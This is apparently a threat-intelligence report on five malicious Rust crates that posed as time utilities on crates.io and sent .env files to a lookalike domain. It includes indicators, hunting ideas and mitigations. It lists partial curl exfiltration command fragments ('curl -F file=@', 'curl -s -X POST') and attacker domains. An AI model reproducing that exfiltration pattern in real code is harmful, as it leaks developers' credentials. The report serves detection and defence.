5 Malicious Rust Crates Posed as Time Utilities to Exfiltrate .env Files

Key Takeaways

• Five malicious Rust crates were discovered on crates.io masquerading as local time utilities.
• The crates covertly exfiltrate .env files containing sensitive developer credentials to a lookalike domain (timeapis[.]io).
• The malware uses curl to generate decoy HTTPS traffic before downgrading to an HTTP POST for exfiltration.
• Execution is triggered unconditionally during routine parameter validation, requiring no special interaction from the developer.
• The threat actor utilized typosquatting and brandjacking techniques to trick developers into downloading the crates.

Affected Systems

• Rust developer environments
• CI/CD pipelines
• crates.io ecosystem

Attack Chain

The threat actor published malicious Rust crates to crates.io, masquerading as local time utilities using typosquatting and brandjacking. When a developer or CI pipeline executes the crate, routine parameter validation functions trigger background threads. The malware first generates decoy HTTPS traffic to a legitimate-looking domain using curl. It then downgrades to HTTP and uses curl to exfiltrate the local .env file via a multipart POST request to a lookalike domain.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: Socket AI Scanner, cargo-audit, cargo-deny

The article does not provide raw detection rules but notes that tools like Socket AI Scanner, cargo-audit, and cargo-deny can identify or block these malicious crates.

Detection Engineering Assessment

EDR Visibility: Medium — EDRs can monitor process creation events (e.g., curl spawned by Rust binaries) and network connections, but might lack the context of the supply chain origin. Network Visibility: High — The exfiltration occurs over plain HTTP to a specific lookalike domain, making network-level detection and blocking highly effective. Detection Difficulty: Moderate — While the network traffic and curl execution are noisy, they occur in developer environments where curl and network requests are common, potentially leading to false positives if not tuned to specific domains or file targets.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon Event ID 1)
• Network Connections (Sysmon Event ID 3)
• DNS Queries (Sysmon Event ID 22)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for unexpected child processes of build tools or compiled Rust binaries spawning curl with form upload arguments targeting .env files.	Process execution logs	Exfiltration	Low
Identify HTTP POST requests to the known lookalike domain or plain HTTP traffic containing .env file contents.	Network traffic logs, Proxy logs	Exfiltration	Low
Monitor for DNS resolution of the lookalike domain originating from developer workstations or CI/CD servers.	DNS query logs	Command and Control	Low

Control Gaps

• Lack of outbound network filtering in CI/CD pipelines
• Implicit trust in open-source package registries without behavioral analysis

Key Behavioral Indicators

• curl execution with arguments targeting .env files
• HTTP POST to timeapis[.]io
• Unexpected background threads in Rust applications making external network requests

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Remove the identified malicious crates (chrono_anchor, dnp3times, time_calibrator, time_calibrators, time-sync) from all projects.
• Rotate any credentials, API keys, or tokens stored in .env files if the malicious crates were executed.

Infrastructure Hardening

• Restrict outbound network access in build and test phases (CI/CD pipelines) to only required endpoints.
• Implement DNS sinkholing for the known malicious domains (timeapis[.]io, kaoing[.]com).

User Protection

• Use tools like cargo-audit and cargo-deny to enforce policies and check for yanked or malicious crates.
• Deploy browser extensions or IDE plugins to flag suspicious dependencies during package review.

Security Awareness

• Educate developers on the risks of typosquatting and brandjacking in package registries.
• Promote the practice of pinning dependencies and reviewing new crates as thoroughly as code changes.

MITRE ATT&CK Mapping

• T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
• T1204 - User Execution
• T1036 - Masquerading
• T1552.001 - Unsecured Credentials: Credentials In Files
• T1005 - Data from Local System
• T1583.001 - Acquire Infrastructure: Domains
• T1071.001 - Application Layer Protocol: Web Protocols
• T1041 - Exfiltration Over C2 Channel

Additional IOCs

• Domains:
  • timeapi[[.]]io - Domain used for decoy HTTPS GET requests.
  • kaoing[[.]]com - Disposable email domain used by the threat actor.
• Urls:
  • hxxps://github[[.]]com/suntea279491 - GitHub account associated with the threat actor.
  • hxxps://github[[.]]com/dictorudin - GitHub account associated with the threat actor.
• File Paths:
  • .env - Target file for exfiltration containing developer secrets and API keys.
• Command Lines:
  • Purpose: Decoy traffic generation | Tools: curl | Stage: Execution/Evasion | curl -s -m 3
  • Purpose: Exfiltration of .env file via HTTP POST | Tools: curl | Stage: Exfiltration | curl -s -X POST
  • Purpose: Multipart form upload of local file | Tools: curl | Stage: Exfiltration | curl -F file=@
• Other:
  • chrono_anchor - Malicious Rust crate
  • dnp3times - Malicious Rust crate
  • time_calibrator - Malicious Rust crate
  • time_calibrators - Malicious Rust crate
  • time-sync - Malicious Rust crate
  • gehakax777 - Threat actor alias
  • dictorudin - Threat actor alias
  • suntea279491 - Threat actor alias